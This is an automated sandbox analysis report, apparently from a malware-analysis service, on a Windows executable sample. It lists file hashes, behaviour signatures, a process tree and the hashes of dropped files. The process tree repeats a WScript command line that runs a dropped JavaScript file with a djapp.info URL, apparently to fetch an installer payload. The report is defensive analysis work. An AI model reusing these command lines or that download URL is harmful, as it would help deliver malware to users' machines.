Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    06/06/2024, 05:47

General

  • Target

    9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    9a14d3ea3b1c04ce0581661a6b75e24c

  • SHA1

    08b2deac27376195c9a241a08b8918b2941b9ad9

  • SHA256

    fc79b49e3af566e67fa165c6ce098abf921bb32e979cb63824cdfc972baa5c2d

  • SHA512

    7b3e6f434ef01c3c6348f75d5d709b37c266876f48668f3b9171f90e60c75016c83e7233c7f68495b3cccf9cade935a17a46cc46819f31f68760403fb0819f01

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3F:/7BSH8zUB+nGESaaRvoB7FJNndno

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe
      2⤵
      • Blocklisted process makes network request
      PID:2924
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe
      2⤵
      • Blocklisted process makes network request
      PID:2380
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe
      2⤵
      • Blocklisted process makes network request
      PID:1800
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe
      2⤵
      • Blocklisted process makes network request
      PID:1568
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe
      2⤵
      • Blocklisted process makes network request
      PID:3020
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 496
      2⤵
      • Program crash
      PID:2952

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          1KB

          MD5

          27d886bc9f7deaa19ac45cd2e485a357

          SHA1

          03cd9680cc47a0cf8136b322ac17c8f91baa3d38

          SHA256

          963680554db266eebb6fddf0e3a532a175e43b2f7bfcbd916447c6ed94b6b036

          SHA512

          f97b7e50d5693666689474f9854ac6bdbc89233026b852c56484c33c7a9eb93a0bff32b5687cb395be14cf663a38e807635e604b9cad603ca115d970a8e4aaa6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          724B

          MD5

          8202a1cd02e7d69597995cabbe881a12

          SHA1

          8858d9d934b7aa9330ee73de6c476acf19929ff6

          SHA256

          58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

          SHA512

          97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          410B

          MD5

          43762f008e07000323863ee51e051b49

          SHA1

          8615237f1ab58069fd6d7712f23310969a7e7092

          SHA256

          464c6ce8fe548ae843b23a6349ac5cb2b3a340e44fffb9fb01319854fe18234c

          SHA512

          01ea0f0b243011933dc26bde0c58885fd3274dbd8025a29d565d0a3d9821809651593d1d2bdb2ead8ce40c0557e1c957b166f474da2f41d2099d78d0840e026d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          0e302cfc6869f4d030ec1d75c5ea4fd7

          SHA1

          a29cabd1b4954fa093303e283b9a40e9f3c995ce

          SHA256

          5f42138bfba3cfed537717022044c96bbe9a7b665c1caba2709178fb3b1e7343

          SHA512

          8bf45173baab977a382957fff8517ba27447bf01eeb89d2d58b60559ad81bf0880b64f06a09f699f625f58c2f3042df737997bea600179a4843da2dafe736a60

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          392B

          MD5

          0a1da893372e03c26e64815ff35a385a

          SHA1

          a583ac67607fd146376c25fbe65f57d3ef7944fa

          SHA256

          a254e570ea3514529594515571a9dde7f0939c0223cbb9b21db113a4bc9c9515

          SHA512

          802fc0694a470710583e4295201df8c0f79c6bab0580019bc864fd12a17b64c947ae56dddc064c65dbb7e400f6e0dd1aa4a37a8fd8cbd858936fc54de62209a0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

          Filesize

          40KB

          MD5

          75d54c7edc9c43ddf31caf07c905346a

          SHA1

          6e4d5d9f6b9f2f37bcf47786e8a2619936d046a2

          SHA256

          5af74c12aaf545b45d2364f9cdba86c764bd4eec9d13f61335d9dbea5e9bec6e

          SHA512

          d98c51681ddd718ec45b8a8bdafdb4e4559e963f86a5f0bcf51bcc30f65328e1eb7731c5c8498cb0c71ac90b9468f81084ae9e856f32e983d06904dcab0fbe94

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

          Filesize

          6KB

          MD5

          a53d4b41228a168f6028756045efe947

          SHA1

          4860a5b737f0cce9fd4e143f7549936ffa4e1eaa

          SHA256

          62d3994659d3b00410df487fdd192f71fab3e8565d6fce8a1a5b9fca3e6bbfe1

          SHA512

          6fdee7680f63d99e4ea9cc3c8d33b50fd165567f70ad88ee4e7a51d18bbd5725d8f834938ddc9b0843dcf0dbbf22296d29ea4f54061ebbe7a4587363336c2426

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

          Filesize

          6KB

          MD5

          dc3be7cf8fe345b0ab6113e3c056e687

          SHA1

          df7f5761ce9d4b7d9498b6882c47eced35084748

          SHA256

          546bfe8b128df06ba3b8882a39a08daa5ffd03706ff90b9831df5c62e17dbca1

          SHA512

          944d9da9a2962049b845c6dec89dba0337aaadc166676e17c1cf6b0f788721901da387ae831ee7f3a7efc52806ecb5cd7bf6fb74dfd4d7aac3c175bd331bdafd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

          Filesize

          6KB

          MD5

          aca885a88ca38639e61e4d3fb99b1ec0

          SHA1

          3a33b92b966f51d5ca255f74303a47b5c232ed75

          SHA256

          d34b764990476025b1a0392f29f3a7d9d57c0411172e66d34e35a6396a0fe225

          SHA512

          d1a6f87b7333f48278f1aebe1019ebe66d1cb395a3f574cd272f4b9045166e21d1e641dbc35449603b656aa8f44b2f4e97fd425c4fb2e694c8275cd7ea3ecb98

        • C:\Users\Admin\AppData\Local\Temp\Cab5D1E.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Users\Admin\AppData\Local\Temp\Tar82C8.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Users\Admin\AppData\Local\Temp\fuf2194.js

          Filesize

          3KB

          MD5

          3813cab188d1de6f92f8b82c2059991b

          SHA1

          4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

          SHA256

          a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

          SHA512

          83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HZ5Y860Q.txt

          Filesize

          177B

          MD5

          82bfdaf8c5b5957e7c60b7e2fbf29c3b

          SHA1

          a4e8f1a6ff36f2d3e9fddb4d22cb09eb926945b5

          SHA256

          5d34e24017ad50a02ba801f968e6d96779fb24f9faf28c244517d985c58c67df

          SHA512

          eec5841a4499cb5b37ac19a05438737b8f632bf99fe1614ab88dc4cfbb34f0d75e43d178006ca62fa759e27f4f9e26130d2f22727a7fc6ed06260dabb1c10e00